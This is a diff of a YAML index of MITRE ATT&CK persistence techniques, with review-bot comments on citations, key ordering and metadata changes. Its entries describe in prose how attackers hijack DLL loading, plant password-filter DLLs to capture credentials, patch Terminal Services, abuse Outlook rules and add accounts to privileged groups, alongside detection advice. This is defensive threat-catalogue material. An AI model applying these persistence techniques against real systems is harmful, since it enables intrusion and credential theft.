- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -28584,8 +28957,8 @@ persistence:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -28599,7 +28972,7 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -28625,6 +28998,10 @@ persistence:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
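Review bot: the new Hexacorn DLL Hijacking reference has a matching `(Citation: Hexacorn DLL Hijacking)` added to the T1574.001 description earlier in this diff, so the citation resolves. Visible in the unchanged context but not introduced here: the adjacent Microsoft Security Advisory 2269637 entry has an empty year, 'Microsoft. (, May 23)', which is pre-existing upstream data and worth reporting upstream rather than patching in this index.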
@@ -28652,42 +29029,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1137.006:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
- type: attack-pattern
- created: '2019-11-07T19:52:52.801Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.006
- url: https://attack.mitre.org/techniques/T1137/006
- - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
- description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
- source_name: Microsoft Office Add-ins
- - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
- description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
- Persistence. Retrieved July 3, 2017.
- source_name: MRWLabs Office Persistence Add-ins
- - source_name: FireEye Mail CDS 2018
- url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
- description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
- Enterprise Email Compromise. Retrieved April 22, 2019.
- - source_name: GlobalDotName Jun 2019
- url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
- description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
- - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:37:09.190Z'
name: 'Office Application Startup: Add-ins'
description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence
on a compromised system. Office add-ins can be used to add functionality to
@@ -28702,13 +29048,18 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Modification'
@@ -28716,11 +29067,34 @@ persistence:
- 'Windows Registry: Windows Registry Key Creation'
- 'Process: Process Creation'
- 'File: File Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
+ created: '2019-11-07T19:52:52.801Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/006
+ external_id: T1137.006
+ - source_name: FireEye Mail CDS 2018
+ description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
+ Enterprise Email Compromise. Retrieved April 22, 2019.
+ url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
+ - source_name: MRWLabs Office Persistence Add-ins
+ description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
+ Persistence. Retrieved July 3, 2017.
+ url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
+ - source_name: Microsoft Office Add-ins
+ description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
+ url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
+ - source_name: GlobalDotName Jun 2019
+ description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+ - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+ url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.006
atomic_tests: []
T1505.002:
@@ -28751,7 +29125,7 @@ persistence:
url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from
remote code execution. Retrieved June 24, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T17:05:44.321Z'
name: 'Server Software Component: Transport Agent'
description: "Adversaries may abuse Microsoft transport agents to establish
persistent access to systems. Microsoft Exchange transport agents can operate
@@ -28789,13 +29163,11 @@ persistence:
- SYSTEM
- Administrator
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1505.002
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -28821,7 +29193,7 @@ persistence:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
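Review bot: this hunk renames a contributor on T1574.014 from 'Ivy Bostock' to 'Ivy Drexel' with no other change to the entry; a contributor-name edit should be traceable to the upstream ATT&CK object rather than a local correction, so please confirm the source (the `modified` bump to '2024-04-28T15:44:25.342Z' in the preceding hunk suggests it is upstream, in which case this is fine).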
@@ -28863,7 +29235,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1098.006:
technique:
@@ -28941,11 +29312,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -29025,35 +29395,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
@@ -29077,71 +29422,60 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
T1505.005:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
- created: '2022-03-28T15:34:44.590Z'
- x_mitre_version: '1.0'
- external_references:
- - source_name: mitre-attack
- external_id: T1505.005
- url: https://attack.mitre.org/techniques/T1505/005
- - source_name: James TermServ DLL
- url: https://twitter.com/james_inthe_box/status/1150495335812177920
- description: James. (2019, July 14). @James_inthe_box. Retrieved March 28,
- 2022.
- - source_name: Microsoft System Services Fundamentals
- url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
- description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
- Retrieved March 28, 2022.
- - source_name: Microsoft Remote Desktop Services
- url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
- description: Microsoft. (2019, August 23). About Remote Desktop Services.
- Retrieved March 28, 2022.
- - source_name: RDPWrap Github
- url: https://github.com/stascorp/rdpwrap
- description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
- Retrieved March 28, 2022.
- - source_name: Windows OS Hub RDP
- url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
- description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
- Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-12T19:40:42.810Z'
+ name: 'Server Software Component: Terminal Services DLL'
description: |-
Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
[Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: svchost.exe
) load the service's DLL file, the location of which is stored in a Registry entry named ServiceDll
.(Citation: Microsoft System Services Fundamentals) The termsrv.dll
file, typically stored in `%SystemRoot%\System32\`, is the default ServiceDll
value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal termsrv.dll
functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the termsrv.dll
file or modifying the ServiceDll
value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Server Software Component: Terminal Services DLL'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for changes to Registry keys associated with ServiceDll
and other subkey values under HKLM\System\CurrentControlSet\services\TermService\Parameters\
.
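Review bot: this region re-emits the whole T1505.005 object with every key in a different position (the `-`/`+` pairs around `type`, `id`, `created`, `x_mitre_version`, `external_references`, `x_mitre_deprecated` and `kill_chain_phases` move content rather than change it, and the removed reference list reappears further down with the twitter.com link replaced by x.com), so the only real deltas here, the `modified` bump to `2024-09-12T19:40:42.810Z` and the reference URL swap, are hard to spot. Suggest the generator serialize technique keys and `external_references` entries in a fixed order so a resync diff shows only content changes. The context description also carries line breaks inside tokens (`svchost.exe` / `)`, `ServiceDll` / `.`), which looks like markup stripped from the upstream text; that is pre-existing and should be fixed in the export step, not hand-patched in a generated file.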
@@ -29150,24 +29484,56 @@ persistence:
Monitor commands as well as processes and arguments for potential adversary actions to modify Registry values (ex: reg.exe
) or modify/replace the legitimate termsrv.dll
.
Monitor module loads by the Terminal Services process (ex: svchost.exe -k termsvcs
) for unexpected DLLs (the default is %SystemRoot%\System32\termsrv.dll
, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Command: Command Execution'
- 'File: File Modification'
- 'Windows Registry: Windows Registry Key Modification'
- 'Process: Process Creation'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
+ created: '2022-03-28T15:34:44.590Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1505/005
+ external_id: T1505.005
+ - source_name: James TermServ DLL
+ description: James. (2019, July 14). @James_inthe_box. Retrieved September
+ 12, 2024.
+ url: https://x.com/james_inthe_box/status/1150495335812177920
+ - source_name: Microsoft System Services Fundamentals
+ description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
+ Retrieved March 28, 2022.
+ url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
+ - source_name: Microsoft Remote Desktop Services
+ description: Microsoft. (2019, August 23). About Remote Desktop Services.
+ Retrieved March 28, 2022.
+ url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
+ - source_name: RDPWrap Github
+ description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
+ Retrieved March 28, 2022.
+ url: https://github.com/stascorp/rdpwrap
+ - source_name: Windows OS Hub RDP
+ description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
+ Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
+ url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1505.005
atomic_tests: []
T1176:
technique:
- modified: '2024-04-18T23:22:37.874Z'
+ modified: '2024-09-12T19:48:15.871Z'
name: Browser Extensions
description: "Adversaries may abuse Internet browser extensions to establish
persistent access to victim systems. Browser extensions or plugins are small
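Review bot: `- spec_version: '2.1'` is dropped here and `x_mitre_attack_spec_version` goes from 2.1.0 to 3.2.0; the same `spec_version` removal recurs for every technique in this diff, so the commit message should state that the export now omits the STIX `spec_version` field and confirm nothing that consumes this YAML reads it. The rest of the hunk is consistent with a reference-only refresh: `x_mitre_version` stays at '1.0' while `modified` advances, and the only content change is the James TermServ DLL URL moving to x.com with a new retrieval date (the `Retrieved September` / `12, 2024.` split is just YAML folding). The T1176 `modified` bump at the tail belongs to the next object and is fine.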
@@ -29259,8 +29625,8 @@ persistence:
url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
- source_name: Chrome Extension C2 Malware
description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
- get hacked by a Chrome extension. Retrieved November 22, 2017.'
- url: https://kjaer.io/extension-malware/
+ get hacked by a Chrome extension. Retrieved September 12, 2024.'
+ url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
- source_name: Catch All Chrome Extension
description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension
Steals All Posted Data. Retrieved November 16, 2017.
@@ -29291,71 +29657,139 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1176
atomic_tests: []
T1137.005:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:02:26.206Z'
+ name: Outlook Rules
+ description: |-
+ Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+
+ Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
x_mitre_contributors:
- Microsoft Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+
+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Application Log: Application Log Content'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
created: '2019-11-07T20:00:25.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1137.005
url: https://attack.mitre.org/techniques/T1137/005
- - source_name: SilentBreak Outlook Rules
- url: https://silentbreaksecurity.com/malicious-outlook-rules/
- description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
- February 4, 2019.
+ external_id: T1137.005
+ - source_name: Pfammatter - Hidden Inbox Rules
+ description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
+ Microsoft Exchange. Retrieved October 12, 2021.
+ url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
- source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
4, 2019.
- - source_name: Pfammatter - Hidden Inbox Rules
- url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
- description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
- Microsoft Exchange. Retrieved October 12, 2021.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SilentBreak Outlook Rules
+ description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
+ February 4, 2019.
+ url: https://silentbreaksecurity.com/malicious-outlook-rules/
- source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
- name: Outlook Rules
- description: |-
- Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
-
- Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+ url: https://github.com/sensepost/notruler
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1098.007:
+ technique:
+ modified: '2024-10-14T14:32:08.926Z'
+ name: Additional Local or Domain Groups
+ description: "An adversary may add additional local or domain groups to an adversary-controlled
+ account to maintain persistent access to a system or domain.\n\nOn Windows,
+ accounts may use the `net localgroup` and `net group` commands to add existing
+ users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+ Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+ the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+ added to the local administrators group on Windows devices to maintain elevated
+ privileges. They may also be added to the Remote Desktop Users group, which
+ allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+ to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+ Linux, accounts may be added to the sudoers group, allowing them to persistently
+ leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+ for elevated privileges. \n\nIn Windows environments, machine accounts may
+ also be added to domain groups. This allows the local SYSTEM account to gain
+ privileges on the domain.(Citation: RootDSE AD Detection 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_detection: |-
- Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-
- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Application Log: Application Log Content'
- - 'Command: Command Execution'
